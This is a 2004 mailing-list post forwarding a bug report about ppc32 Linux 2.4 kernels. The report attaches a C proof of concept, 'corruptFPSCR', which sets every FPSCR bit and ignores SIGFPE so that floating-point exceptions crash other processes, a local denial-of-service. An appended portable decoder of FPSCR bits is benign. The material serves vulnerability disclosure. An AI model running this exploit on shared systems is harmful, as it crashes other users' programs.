[Tfug] [jason.mcmullan@timesys.com: FPSCR corruption]
Tom Rini
trini at kernel.crashing.org
Wed Jun 16 12:08:42 MST 2004

Since Goldarg mentioned it, here's a brand new ppc32-specific DoS.
The search, I would guess, was inspired by the recent ia32 thing, but
this isn't as critical (crashing random apps, if you're lucky, not lock
the machine).

But since I haven't had time to verify this myself, I do hope I don't
end up with egg on my face. :)

----- Forwarded message from "McMullan, Jason" <jason.mcmullan at timesys.com> -----
Subject: FPSCR corruption
From: "McMullan, Jason" <jason.mcmullan at timesys.com>
To: linuxppc-embedded at lists.linuxppc.org
Date: Wed, 16 Jun 2004 14:09:51 -0400
Oddity. I'm seeing SIGFPEs arrive in the wrong process.
I'm seeing this in my 2.4.x kernels, on 8260 and 750 cpus (and anything
else that has an FPU).
Example programs attached. Run 'someFPU' in an xterm. Run 'corruptFPSCR'
in another. Watch 'someFPU' die.
Is this a similar issue to the fast-syscall-return FPU path bug that
troubled the ia64 port?
(and yes, 'corruptFPSCR' is pathological, but so are most
denial-of-service exploits)
--
Jason McMullan <jason.mcmullan at timesys.com>
TimeSys Corporation
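
/* First attached program ('someFPU'): does floating-point work in a loop. */
#include <math.h>
#include <stdio.h>
#include <time.h>

int main(int argc, char * argv[])
{
    struct timespec sleeptime;

    sleeptime.tv_sec = 0;
    sleeptime.tv_nsec = 500000;   /* 0.5 ms between FPU uses */
    while (1)
    {
        pow(2.0, 3.3);            /* FPU work; the result is not used */
        nanosleep(&sleeptime, NULL);
    }
    return 0;
}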

/* Second attached program ('corruptFPSCR'): writes an all-ones value to FPSCR. */
#include <math.h>
#include <stdio.h>
#include <signal.h>

/* Load all eight FPSCR fields (mask 0xff) from a floating-point register. */
#define fesetenv_register(env) \
    ({ double d = (env); asm volatile ("mtfsf 0xff,%0" : : "f" (d)); })

/* View of a double as two 32-bit words (unsigned long is 32 bits on ppc32). */
typedef union
{
    double fenv;
    unsigned long fpscr[2];
} my_fenv_union_t;

void sigfpeHandler(int x)
{
    // Do nothing.
    // The exception will be rethrown forever...
    // until it affects another process ;-(
}

int main ()
{
    // Register to SIGFPE
    signal(SIGFPE, sigfpeHandler);

    // Force the generation of a SIGFPE
    my_fenv_union_t fenvt;
    fenvt.fpscr[1] = 0xffffffff;
    fesetenv_register(fenvt.fenv);
    return 0;
}

----- End forwarded message -----
--
Tom Rini
http://gate.crashing.org/~trini/
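
As an added illustration (not part of the forwarded message or its attachments), the following portable C decodes a 32-bit FPSCR value using the PowerPC architecture's bit layout and reports which enabled exceptions it leaves pending, which is why the 0xffffffff written by 'corruptFPSCR' is a trapping state. The function and macro names are made up for this example, and it needs no PowerPC hardware to run.

```c
#include <stdint.h>
#include <stdio.h>

/* IBM numbering: FPSCR bit 0 is the most significant of the 32 bits. */
#define FPSCR_BIT(n) (UINT32_C(1) << (31 - (n)))
/* Invalid-operation cause bits (7-12 and 21-23); VX is their summary. */
#define FPSCR_VX_CAUSES UINT32_C(0x01F80700)

static const struct { uint32_t status, enable; const char *name; } fpscr_exc[] = {
    { FPSCR_VX_CAUSES, FPSCR_BIT(24), "invalid operation (VE)" },
    { FPSCR_BIT(3),    FPSCR_BIT(25), "overflow (OE)" },
    { FPSCR_BIT(4),    FPSCR_BIT(26), "underflow (UE)" },
    { FPSCR_BIT(5),    FPSCR_BIT(27), "zero divide (ZE)" },
    { FPSCR_BIT(6),    FPSCR_BIT(28), "inexact (XE)" },
};
#define N_EXC (sizeof fpscr_exc / sizeof fpscr_exc[0])

/* Return the enable bits whose exception status is also set. A nonzero
 * result means the value describes an enabled exception that is already
 * pending, which is the condition the FEX summary bit reports. */
uint32_t fpscr_pending_enabled(uint32_t fpscr)
{
    uint32_t pending = 0;
    for (size_t i = 0; i < N_EXC; i++)
        if ((fpscr & fpscr_exc[i].status) && (fpscr & fpscr_exc[i].enable))
            pending |= fpscr_exc[i].enable;
    return pending;
}

/* Print a one-line verdict plus the name of each pending enabled exception. */
void fpscr_report(uint32_t fpscr)
{
    uint32_t pending = fpscr_pending_enabled(fpscr);
    printf("FPSCR 0x%08lx: %s\n", (unsigned long)fpscr,
           pending ? "enabled exception pending" : "no enabled exception pending");
    for (size_t i = 0; i < N_EXC; i++)
        if (pending & fpscr_exc[i].enable)
            printf("  %s\n", fpscr_exc[i].name);
}

int main(void)
{
    fpscr_report(UINT32_C(0xffffffff)); /* value written by corruptFPSCR */
    fpscr_report(0);                    /* constructed: everything clear */
    fpscr_report(FPSCR_BIT(5));         /* constructed: ZX recorded, ZE off */
    return 0;
}
```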